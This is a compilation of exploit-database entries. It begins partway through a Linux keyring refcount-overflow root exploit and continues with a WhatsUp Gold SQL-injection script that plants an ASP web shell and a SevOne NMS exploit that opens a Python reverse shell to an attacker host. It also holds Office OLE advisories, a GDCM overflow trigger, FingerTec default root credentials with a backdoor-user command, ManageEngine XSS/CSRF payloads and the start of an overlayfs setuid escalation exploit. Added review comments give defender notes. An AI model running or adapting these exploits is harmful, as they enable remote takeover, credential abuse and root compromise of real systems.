	 * Repeats the same join close to 2^32 times, sleeping 5 s at points
	 * that halve the remaining distance. Per the title this is meant to
	 * wrap a 32-bit reference count. Seen from the defender's side it is
	 * billions of identical keyctl() calls from one unprivileged process
	 * over a long run, a volume that per-process syscall accounting or
	 * auditing of keyctl would make stand out.
	 */
	puts("Increfing...");
    for (i = 1; i < 0xfffffffd; i++) {
        if (i == (0xffffffff - l)) {
            l = l/2;
            sleep(5);
        }
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
    sleep(5);
    /* here we are going to leak the last references to overflow */
    for (i=0; i<5; ++i) {
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }

    puts("finished increfing");
    puts("forking...");
    /* allocate msg struct in the kernel rewriting the freed keyring object */
    for (i=0; i<64; i++) {
        pid = fork();
        if (pid == -1) {
            perror("fork");
            return -1;
        }

        if (pid == 0) {
            /* child: own message queue, 64 copies of msg, then sleep */
            sleep(2);
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
            for (i = 0; i < 64; i++) {
                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
            sleep(-1);
            exit(1);
        }
    }
   
    puts("finished forking");
    sleep(5);

    /* call userspace_revoke from kernel */
    puts("caling revoke...");
    if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
        perror("keyctl_revoke");
    }

    /* the shell is started whether or not the credentials changed; the
       second uid/euid line is the only indication of the outcome */
    printf("uid=%d, euid=%d\n", getuid(), geteuid());
    execl("/bin/sh", "/bin/sh", NULL);

    return 0;
}
            
#
# Exploit Title: WhatsUp Gold v16.3 Unauthenticated Remote Code Execution
# Date: 2016-01-13
# Exploit Author: Matt Buzanowski
# Vendor Homepage: http://www.ipswitch.com/
# Version: 16.3.x
# Tested on: Windows 7 x86
# CVE : CVE-2015-8261
# Usage: python DroneDeleteOldMeasurements.py <target ip>

import requests
import sys

# Target address, taken unchecked from the first command-line argument.
ip_addr = sys.argv[1]

# Classic-ASP fragment that runs whatever arrives in the "cmd" query
# parameter and writes the command's output into the response.
shell = '''<![CDATA[<% response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall() %>]]>'''

# Value placed in <iDroneName>. It closes the string the server builds, then
# uses ATTACH DATABASE to create a new database file at a path under the
# NmConsole web directory and inserts the ASP fragment as a row.
# Root cause on the server side: the iDroneName value reaches a SQL
# statement by string concatenation rather than as a bound parameter.
sqli_str = '''stuff'; END TRANSACTION; ATTACH DATABASE 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\HTML\\NmConsole\\shell.asp' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('%s');--''' % shell

session = requests.Session()

# SOAP headers for the DroneDeleteOldMeasurements operation.
headers = {"SOAPAction":"\"http://iDrone.alertfox.com/DroneDeleteOldMeasurements\"","User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.4927)","Expect":"100-continue","Content-Type":"text/xml; charset=utf-8","Connection":"Keep-Alive"}

# The authorizationString is a fixed dummy value; per the exploit title the
# endpoint accepts the request without authentication.
body = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <DroneDeleteOldMeasurements xmlns="http://iDrone.alertfox.com/">
      <serializedDeleteOldMeasurementsRequest><?xml version="1.0" encoding="utf-16"?>
        <DeleteOldMeasurementsRequest xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <authorizationString>0123456789</authorizationString>
        <maxAgeInMinutes>1</maxAgeInMinutes>
        <iDroneName>%s</iDroneName>
        </DeleteOldMeasurementsRequest></serializedDeleteOldMeasurementsRequest>
    </DroneDeleteOldMeasurements>
  </soap:Body>
</soap:Envelope>""" % sqli_str

# Detection points visible in this request: a POST to
# /iDrone/iDroneComAPI.asmx over plain HTTP with the
# DroneDeleteOldMeasurements SOAPAction and SQL keywords inside iDroneName,
# and afterwards an unexpected .asp file in the NmConsole directory.
response = session.post("http://%s/iDrone/iDroneComAPI.asmx" % ip_addr,data=body,headers=headers)
print "Status code:", response.status_code
print "Response body:", response.content

# NOTE(review): this message is printed unconditionally; the status code and
# body above are never checked before success is claimed.
print "\n\nSUCCESS!!! Browse to http://%s/NmConsole/shell.asp?cmd=whoami for unauthenticated RCE.\n\n" % ip_addr
            
#!/usr/bin/env python

# Exploit Title: SevOne NMS <= 5.3.6.0 reverse shell remote root
# Date: 01/14/2016
# Exploit Author: @iamsecurity
# Vendor Homepage: https://www.sevone.com/
# Software Link: https://www.sevone.com/download2/free/vimage/SevOne-Download.ova
# Version: 5.3.6.0
"""sevone.py: Simple reverse root shell exploit for SevOne <= 5.3.6.0.
Details: http://russiansecurity.expert/2016/01/14/critical-security-issues-in-sevone-nms/
run: ./sevone.py "sevone_url" lhost lport
"""

import sys
import requests

__author__ = '@iamsecurity'


def main():
    """Run the SevOne NMS <= 5.3.6.0 proof of concept described in the module docstring.

    Reads the target base URL, a connect-back host and a connect-back port
    from ``sys.argv``, logs in with an account whose name and password are
    constants in this script, and sends two POST requests to
    ``/doms/discoveryqueue/kill.php`` whose ``pids[]`` field carries
    backtick-wrapped shell text instead of process ids.

    Defender notes (review):
      * The ``pids[]`` values are shell text; the backticks suggest the
        server interpolates the field into a shell command (presumably;
        the server side is not shown here). Accepting only integers for
        ``pids[]`` and never building shell commands from request data
        removes this class of bug.
      * The login uses a fixed account/password pair. If it is a built-in
        product account (not confirmed by this file), it should be
        disabled or its password rotated.
      * Detection: POSTs to ``kill.php`` with non-numeric ``pids[]`` values,
        short-lived ``/tmp/sess_*`` files written by ``dd``, and a
        ``python`` child of the web service opening an outbound connection.

    Exits with status 1 when fewer than three arguments are given.
    """
    if len(sys.argv) < 4:
        print('Enter url of SevOne PAS server and listen IP and PORT to connect back.\nUsage: ' + sys.argv[0] +
              ' "sevone_url" lhost lport\nExample: ./sevone.py http://192.168.1.104 192.168.1.105 31337')
        sys.exit(1)
    # Silences urllib3 warnings; together with s.verify = False below this
    # means the TLS certificate of the target is never validated.
    requests.packages.urllib3.disable_warnings()
    url = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    login_url = url + "/doms/login/processLogin.php"
    rce_url = url + "/doms/discoveryqueue/kill.php"
    # Credentials are constants in the script, not user input.
    login = "SevOneStats"
    password = "n3v3rd13"
    s = requests.Session()
    s.verify = False
    # Two backtick-wrapped command strings. lhost and lport are concatenated
    # into the first one verbatim. The first writes a script to a file under
    # /tmp via dd; the second runs that file with python and then deletes it.
    payload = [
        '`echo \'import os; import pty; import socket; lhost="'+lhost+'"; lport='+lport+'; s=socket.socket(socket.AF_IN'
        'ET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fi'
        'leno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close()\' | dd of=/tmp/sess_ap6k1d1ucb'
        'etfk9fhcqdnk0be5`',
        '`python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5`'
    ]
    # The login response is not inspected; the session cookie, if any, is
    # carried by the requests.Session for the following calls.
    s.post(login_url, {'login': login, 'passwd': password, 'tzString': 1})
    s.post(rce_url, {'pids[]': payload[0]})
    try:
        # A 1 ms timeout makes the client give up on the response on purpose;
        # only ReadTimeout is handled, any other exception propagates.
        s.post(rce_url, {'pids[]': payload[1]}, timeout=0.001)
    except requests.exceptions.ReadTimeout:
        print("Don't need wait for response from server. Exploit successfully!")
        pass


# Script entry point: main() runs only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=555

It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. The attached POC document "planted-mfplat.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {62dc1a93-ae24-464c-a43e-452f824c4250} (formatted as pack(">IHHBBBBBBBB")) which is one of several registered objects that have an InProcServer32 of WMALFXGFXDSP.dll. Other options include: 

{637c490d-eee3-4c0a-973f-371958802da2}
{874131cb-4ecc-443b-8948-746b89595d20}
{96749377-3391-11D2-9EE3-00C04F797396}

When a user opens this document and single-clicks the icon for foo.txt, ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to wmalfxgfxdsp!DllGetClassObject(), which does a LoadLibraryW() call for "mfplat". Because the library is requested by bare name rather than by full path, the DLL search can resolve it from the current working directory: if the attached mfplat.dll is placed in the same directory as the planted-mfplat.doc file, you should see a popup coming from this DLL being loaded from the current working directory of Word.

Here is the call stack leading up to the vulnerable LoadLibraryW() call:

0:000> kb 
ChildEBP RetAddr  Args to Child              
002c8d18 68f02e2f 68f02e70 68f013bc 003f0774 kernel32!LoadLibraryW
002c8d28 68f01ff4 00000000 002c93f4 003ff174 WMALFXGFXDSP!InitAVRTAlloc+0x58
002c8d3c 7660aec6 003f0764 00000000 002c8de4 WMALFXGFXDSP!DllGetClassObject+0x87
002c8d58 765e91cd 003f0764 7660ee84 002c8de4 ole32!CClassCache::CDllPathEntry::DllGetClassObject+0x30 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3324]
002c8d70 765e8e92 002c8d84 7660ee84 002c8de4 ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+0x1f [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3831]
002c8da8 765e8c37 002c8dec 00000000 002c93f4 ole32!CClassCache::GetClassObject+0x49 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 4582]
002c8e24 76603170 76706444 00000000 002c93f4 ole32!CServerContextActivator::CreateInstance+0x110 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 974]
002c8e64 765e8daa 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
002c8eb8 765e8d1f 7670646c 00000000 002c93f4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
002c8ed8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
002c8ef8 765e8a53 76706494 002c9250 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
002c8f34 765e8e0d 76706494 002c9250 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
002c8f5c 76603170 76706494 00000000 002c93f4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
002c8f9c 76602ef4 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
002c91fc 76603170 76706448 00000000 002c93f4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
002c923c 76603098 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
002c9a10 76609e25 002c9b2c 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
002c9a70 76609d86 002c9b2c 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
002c9a94 76609d3f 002c9b2c 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
002c9ac4 7662154c 002c9b2c 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
002c9b40 7661f2af 62dc1a93 464cae24 2f453ea4 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
002c9ba4 7661f1d4 06370820 00000000 5f3363a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
002c9bcc 611483bf 06370820 5f3363a8 045d86e0 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
WARNING: Stack unwind information not available. Following frames may be wrong.
002c9c40 5f7c3973 06370820 5f3363a8 045d86e0 mso!Ordinal2023+0x7c
002c9c8c 5f7c3881 036fe800 06370820 5f3363a8 wwlib!DllGetLCID+0x46e24d


This DLL load can be triggered without user interaction with the following RTF document:

{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7b62dc1a93-ae24-464c-a43e-452f824c4250\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39233.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=594

Heap corruption buffer underflow in devenum.dll!DeviceMoniker::Load()

There exists a buffer underflow vulnerability in devenum.dll!DeviceMoniker::Load when attempting to null terminate a user supplied string. The function as it exists on Windows 7 x86 is implemented as follows:

// Decompiler output for devenum.dll!CDeviceMoniker::Load (Windows 7 x86), as
// quoted by the advisory. The function reads a 4-byte length from the stream,
// allocates that many bytes, reads the data, writes a 16-bit terminator and
// hands the buffer to CDeviceMoniker::Init. Returns the HRESULT of the last
// operation, or -2147024882 when the allocation fails.
//
// Review note: the length comes straight from the stream and is used without
// any lower bound, upper bound or alignment check.
signed int __stdcall CDeviceMoniker::Load(CDeviceMoniker *this, struct IStream *a2)
{
  struct IStream *v2; // esi@1
  signed int v3; // edi@1
  const unsigned __int16 *v4; // ebx@2
  char v6; // [sp+8h] [bp-4h]@1

  v2 = a2; // keep the stream pointer; a2 is reused below to hold the length
  v3 = a2->lpVtbl->Read(a2, &a2, 4, (ULONG *)&v6); // read a 4 byte user controlled length
  if ( v3 >= 0 )
  {
    v4 = (const unsigned __int16 *)operator new[]((unsigned int)a2); // allocate length
    if ( v4 )
    {
      v3 = v2->lpVtbl->Read(v2, (void *)v4, (ULONG)a2, (ULONG *)&v6); // read data into new buffer
      if ( v3 >= 0 )
      {
        // Vulnerable line: for any length below 2, (length >> 1) is 0 and the
        // index becomes -1, so the 16-bit zero is stored 2 bytes before the
        // start of the allocation. A length check (at least 2 bytes, and per
        // the advisory 2-byte aligned and bounded) must precede this store.
        v4[((unsigned int)a2 >> 1) - 1] = 0;
        v3 = CDeviceMoniker::Init(this, v4);
      }
      operator delete[]((void *)v4);
    }
    else
    {
      v3 = -2147024882; // 0x8007000E, i.e. E_OUTOFMEMORY
    }
  }
  return v3;
}

The issue arises when we specify a length of 1 with the first read. A buffer of length 1 will be allocated and 1 byte will be read into it. But when the code goes to NULL-terminate this buffer, it divides the length by 2 and subtracts 1, giving an element index of -1; because v4 points to 2-byte wchar_t elements, "\x00\x00" is written 2 bytes before the allocated buffer.

This object "device.1" or {4315D437-5B8C-11D0-BD3B-00A0C911CE86} is reachable from any bit of software that performs an IPersistStream::Load on an arbitrary object. This vulnerable object is also reachable from any bit of software performing an OleLoad(IID_IOleObject) call with an attacker-controlled CLSID -- as is the case in Office.

In the attached Word Document PoC the OLE object StdObjLink or {00000300-0000-0000-c000-000000000046} is embedded with data pointing to the device.1 object. The StdObjLink supports IOleObject and IPersistStorage interfaces. When a user single clicks the object in the document an OleLoad call will load the StdObjLink object and call its IPersistStorage::Load (ole32!CDefLink::Load()) method. StdObjLink will then read the device.1 CLSID from the \x01Ole stream and call OleLoadFromStream with an interface ID of IMoniker. This call will then result in device.1 being loaded and the IPersistStream::Load() (devenum!DeviceMoniker::Load()) method being called.

The DeviceMoniker::Load() method should limit the user-supplied size to sane values that are 2-byte aligned, rejecting sizes smaller than 2 bytes before the terminator index is computed.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39232.zip
            
/*
Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.

GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
to an
integer overflow vulnerability which leads to a buffer overflow and
potentially to remote code execution. The vulnerability is triggered by the
exposed function gdcm::ImageRegionReader::ReadIntoBuffer, which copies
DICOM
image data to a buffer. ReadIntoBuffer checks whether the supplied
buffer is
large enough to hold the necessary data, however in this check it fails to
detect the occurrence of an integer overflow, which leads to a buffer
overflow
later on in the code. The buffer overflow will occur regardless of the
size of
the buffer supplied to the ReadIntoBuffer call.

More information about this vulnerability can be found at
http://census-labs.com/news/2016/01/11/gdcm-buffer-overflow-imageregionreaderreadintobuffer/

The GDCM project has released version 2.6.2 that addresses this issue.
It is advised to upgrade all GDCM installations to the latest stable
release.

Disclosure Timeline
-------------------
CVE assignment:    December 2nd, 2015
Vendor Contact:    December 4th, 2015
Vendor Patch Release: December 23rd, 2015
Public Advisory: January 11th, 2016
*/

#include "gdcmReader.h"
#include "gdcmImageReader.h"
#include "gdcmImageRegionReader.h"
#include "gdcmBoxRegion.h"
#include "gdcmImageHelper.h"

#include <iostream>

using namespace std;

/*
 * A simple demonstration of CVE-2015-8396
 * by Stelios Tsampas (stelios at census-labs.com)
 * based on http://gdcm.sourceforge.net/html/ExtractImageRegion_8cs-example.html
 *
 * Compiles with:
 * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED
 *
 * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2
 *                https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39229.zip
 * $ bzip2 -d CVE-2015-8396.dcm.bz2
 * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm
 */

/*
 * Minimal reproducer: opens the DICOM file named in argv[1], selects the
 * whole image as the region of interest and asks the library to copy it
 * into a fixed-size local buffer.
 *
 * Returns 1 when no file name is given or the file's information cannot be
 * read, 0 otherwise. The result of ReadIntoBuffer() is not checked.
 *
 * Review note: the defect is in the library, not in this caller. Per the
 * advisory text at the top of this file, ReadIntoBuffer's own size check
 * misses an integer overflow, so passing the true buffer size (as done
 * here) does not protect the caller; the stated fix is GDCM 2.6.2. The
 * image dimensions are read from the file, so code that must run against
 * an unpatched library should treat them as untrusted.
 */
int main(int argc, char *argv [])
{
	/* 2048 * 2047 = 4,192,256 bytes, held in a local array. */
	char buffer[2048 * 2047];
	gdcm::ImageRegionReader reader;
	gdcm::BoxRegion box;

	if (argc < 2) {
		cout << "Usage: example <input-file>\n";
		return 1;
	}

	const char *filename = argv[1];
	reader.SetFileName(filename);
	
	if (!reader.ReadInformation()) {
		cout << "No info from file\n";
		return 1;
	}

	/* Dimensions as reported by the file; printed for reference. */
	std::vector<unsigned int> dims = gdcm::ImageHelper::GetDimensionsValue(reader.GetFile());
	cout << "x: " << dims[0] << ", y: " << dims[1] << ", z: " << dims[2] << "\n";

	/* Region spans 0 .. dim-1 on each of the three axes, i.e. the full image. */
	box.SetDomain(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1);
	reader.SetRegion(box);
	/* The call under test; buffer and its real size are passed in. */
	reader.ReadIntoBuffer(buffer, sizeof(buffer));
	
	return 0;
}
            
# Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices 
# Date: 12-01-2016 
# Exploit Author: Daniel Lawson 
# Contact: http://twitter.com/fang0654 
# Website: https://digital-panther.com 
# Category: physical access control 

1. Description 

Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door. Until the devices can be fixed, their telnet service should not be reachable from untrusted networks. 

2. Proof of Concept 

Login to telnet with the credentials: root / founder88 
At the console type in the command: 
echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat 
This will create a user named Haxx0r with an id of 1337 and a pin of 12345. 
--- 

Daniel Lawson 
Digital Panther Security 
https://digital-panther.com 
            
Manage Engine Applications Manager 12 Multiple Vulnerabilities


[Vendor Product Description]

- ManageEngine Applications Manager is an application performance monitoring solution that proactively monitors 
business applications and helps businesses ensure their revenue-critical applications meet end user expectations. 
Applications Manager offers out-of-the-box monitoring support for 50+ applications and servers.


- Site: https://www.manageengine.com/


[Advisory Timeline]

- 22/10/2015 -> First Contact to Vendor;
- 23/10/2015 -> Vendor responded asking for details;
- 23/10/2015 -> Advisory & Details sent to vendor;
- 03/11/2015 -> Follow up with the vendor. No response received;
- 06/11/2015 -> Second follow up with the vendor. No response received;
- 22/12/2015 -> Final follow up with the vendor. No response received;
- 13/01/2016 -> Public security advisory released;


[Bug Summary]

- Cross Site Scripting (Stored) (CVE-ID Requested)

- Cross Site Request Forgery (CSRF) (CVE-ID Requested)

- Privilege Escalation (CVE-ID Requested)


[Impact]

- High


[Affected Version]

- Applications Manager 12 


[Advisory]

- ZSL-2016-5292
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5292.php


[Bug Description and Proof of Concept]

1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests 
without performing any validity checks to verify the requests. This can be exploited to perform certain actions 
with administrative privileges if a logged-in user visits a malicious web site.
https://en.wikipedia.org/wiki/Cross-site_request_forgery

2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is 
triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user. 
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting

3. Vertical Privilege Escalation - Applications Manager 12 suffers from a privilege escalation issue. A normal user can elevate his/her 
privileges by modifying a GET request, setting the parameter 'username' to 'admin'. An attacker can also exploit this issue through 
cross-site request forgery attacks.
https://en.wikipedia.org/wiki/Privilege_escalation


[Proof-of-Concept]

1. Multiple Stored Cross Site Scripting

Parameter:
description (POST)

Payload:
option=org.apache.struts.taglib.html.TOKEN=05b70e70fce2ede0d6efc8aef01b1519&addmonitors=0&name=%3Cscript%3Ealert%285%29%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&allowners_list=1&grouptype=1&createMV=createMV&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=1

Parameters:
leftexp1, rightexp1, leftexp2, rightexp2 (POST)

Payload: haid=null&method=editAnomalyProfileAction&id=0&secondarycriticalexist=false&secondarywarningexist=false&secondaryinfoexist=false&select=thresholdNumeric&displayname=&criticalthresholdcondition=GT&criticalthresholdvalue=5&criticalconditionjoiner=OR&secondarycriticalthresholdcondition=GT&secondarycriticalthresholdvalue=5&criticalthresholdmessage=Critical+Alarm+Message&consecutive_mincriticalpolls=Use+global+defaults&consecutive_criticalpolls=Use+global+defaults&warningthresholdcondition=EQ&warningthresholdvalue=5&warningconditionjoiner=OR&secondarywarningthresholdcondition=EQ&secondarywarningthresholdvalue=5&warningthresholdmessage=Warning+Alarm+Message&consecutive_minwarningpolls=Use+global+defaults&consecutive_warningpolls=Use+global+defaults&infothresholdcondition=LT&infothresholdvalue=5&infoconditionjoiner=OR&secondaryinfothresholdcondition=LT&secondaryinfothresholdvalue=5&infothresholdmessage=Clear+Alarm+message&consecutive_minclearpolls=Use+global+defaults&consecutive_clearpolls=
Use+global+defaults&description=&cancel=true&percentagevalue=1&anomalyId=10000001&anomalyName=%26lt%3Bscript%26gt%3Balert%26%2340%3B1%29%26lt%3B%2Fscript%26gt%3B&baseformulaType=0&baselineType=1&baseWeek=1&monthYears=8-2015&higherPercentage=1&higherValue=20&alarmType=1&lowerValue=30&loweralarmType=4&sendmail=0&comparisonType=1&leftexp1=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&leftselect=%3E&rightexp1=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&alarmTypeExpression=1&leftexp2=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&rightselect=%3E&rightexp2=%3Cscript%3Ealert%285%29%3C%2Fscript%3E&loweralarmTypeExpression=4&anomalymethod=editAnomalyProfileAction&cancel1=true

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Multiple Cross Site Request Forgery (CSRF)

Sample Payload for executing command:

<!--
  CSRF sample from the advisory. The form has no method attribute, so a
  browser submits it as a GET request to /common/executeScript.do, and none
  of its fields is an anti-CSRF token. A request of this shape succeeding
  shows that the action relies on the session cookie alone.
  Review note: state-changing actions such as this one should require a
  per-session token, accept POST only, and check the Origin/Referer header.
-->
<html>
  <body>
    <form action="http://localhost:9090/common/executeScript.do">
      <input type="hidden" name="method" value="testAction" />
      <input type="hidden" name="actionID" value="10000010" />
      <input type="hidden" name="haid" value="null" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. Privilege Escalation on userconfiguration.do (Become an Admin)

Parameter:
username (GET)

Payload:
[Original]
http://localhost:9090/userconfiguration.do?method=editUser&username=test1&userid=10000003

[Escalated Privileges]
http://localhost:9090/userconfiguration.do?method=editUser&username=admin&userid=10000003

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

All flaws described here were discovered and researched by:

Bikramaditya Guha aka "PhoenixX"
********************************************************************************************************************************************************************************************************************************
            
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2015 halfdog <me (%) halfdog.net>
 *
 *  This program demonstrates how to escalate privileges using
 *  an overlayfs mount within a user namespace. See
 *  http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
 *  for more information.
 *
 *  gcc -o UserNamespaceOverlayfsSetuidWriteExec UserNamespaceOverlayfsSetuidWriteExec.c
 *
 *  Usage: UserNamespaceOverlayfsSetuidWriteExec -- [program] [args]
 *
 */

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/stat.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/** Child entry point passed to clone() by main(), which requests a new
 *  user namespace and a new mount namespace for it.
 *
 *  Steps, in order: wait until the effective uid reads as 0, mount an
 *  overlay of /bin at /tmp/x/bin with /tmp/x/over as the upper directory,
 *  change the mode of "su" inside that mount to 04777, wait for the parent
 *  to finish, then unmount and delete everything under /tmp/x.
 *
 *  arg is not used in this function.
 *  Returns 0 on completion, 1 if the mount or the chmod fails.
 *
 *  Review note: the cleanup at the end removes the files and directories
 *  this program created, so detection should rely on the events themselves
 *  (an overlay mount issued from a user namespace, a setuid mode change
 *  under /tmp) and not on leftover artefacts.
 */
static int childFunc(void *arg) {
  fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
// Poll until the effective uid is 0; presumably this happens once main()
// has written the uid_map for this process - confirm against main().
  while(geteuid()!=0) {
    usleep(100);
  }
  fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());

// Overlay mount: /bin is the read-only lower layer, changes go to
// /tmp/x/over. The workdir option points at the mount point itself.
  int result=mount("overlayfs", "/tmp/x/bin", "overlayfs", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/x/over,workdir=/tmp/x/bin");
  if(result) {
    fprintf(stderr, "Overlay mounting failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
// The chdir result is not checked; the relative chmod below depends on it.
  chdir("/tmp/x/bin");
// Mode 04777: setuid bit plus rwx for everyone, applied to the overlay's
// view of "su". main() waits for /tmp/x/over/su to appear after this.
  result=chmod("su", 04777);
  if(result) {
    fprintf(stderr, "Mode change failed\n");
    return(1);
  }

  fprintf(stderr, "Namespace helper waiting for modification completion\n");
  struct stat statBuf;
  char checkPath[128];
  sprintf(checkPath, "/proc/%d", getppid());
